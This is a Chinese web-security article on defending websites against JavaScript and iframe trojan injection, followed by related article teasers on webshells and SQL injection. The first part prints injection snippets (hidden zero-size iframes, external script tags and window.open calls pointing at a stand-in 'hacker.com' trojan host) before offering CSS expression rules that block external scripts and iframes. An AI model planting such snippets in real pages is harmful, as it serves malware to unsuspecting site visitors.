防止网站被JS,iframe挂马的防范方法                
                
                    所属分类:
                        网络安全 / 脚本攻防                    
                    阅读数:
                        220
                    
                        收藏 0赞 0分享
                    
                 
                
                    这种方法使用的关键代码如下: 
window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。 
另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('<Iframe src="网页木马地址" ></iframe>')”,写入Windows中的写字板另存为后缀为.js的脚本文件,并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 
<script src="http://www.hacker.com/木马脚本.js"></script> 
或者 
document.write("<div style='display:none'>") 
document.write("<iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>") 
document.write("</div>") 
就成功地将木马挂到了对方的网页中了。 
小提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为: 
<div style="behaviour: url(http://www.hacker.com/木马脚本.js);"> 
或者: 
<iframe src="vbscript:[挂马脚本]"> 
等等…… 
防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下: 
iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');} 
script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');} 
不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。 
所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码,这段代码会让异地外域的JS文件在使用document.write()时,被document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完,只有部分被强制输出了,Writer后面的内容再不会被写入访问者的电脑中,从而起到防范JS脚本挂马的作用。 
让JS木马的进程迅速中止 
在 <head> </head> 之间加入如下代码: 
屏蔽script和iframe 
<style type="text/css" id="LinrStudio"> 
/*<![CDATA[*/ 
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} 
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} 
/*]]>*/ 
</style> 
单屏蔽script 
<style type="text/css" id="LinrStudio"> 
/*<![CDATA[*/ 
/*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/ 
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} 
/*]]>*/ 
</style> 
上面的代码经脚本之家测试,代码是根据查找http一般情况下大家写的js路径,是带有域名的,例如脚本之家使用的就是http://img.jb51.net/1.js那么也是无法运行的,所以上面的代码有一定的局限性。大家可以根据需要修改。 
例如我们的地址都是img.jb51.net那么可以写成 
script{ngz1:expression((this.src.indexOf('jb51.net')==-1)?document.close():'');} 
那么我们需要的就是将我们所以的js都写成带http://img.jb51.net的。如果你有更好的方法可以发布下。下面是我们给出的可能需要多重判断 
script{ngz1:expression(((this.src.indexOf('jb51.net')==-1)&&this.src.indexOf('http')==0)?document.close():'');}                                    
             
            
                
                PHP Webshell 下的端口反弹方法
phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
                    
                    收藏 0赞 0分享
PHP+MySQL手工注入语句大全 MySQL手工注入语句总结
PHP + MySQL 手工注入语句大全,MySQL 手工注入语句总结,MySQL,注入语句。暴字段长度 匹配字段 暴字段位置 利用内置函数暴数据库信息 不用猜解可用字段暴数据库信息(有些网站不适用): 操作系统信息
                    
                    收藏 0赞 0分享
PHP 双字节、宽字节编码漏洞
PHP 双字节、宽字节编码漏洞。看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。还是用一个demo.php显示效果
                    
                    收藏 0赞 0分享
                 查看更多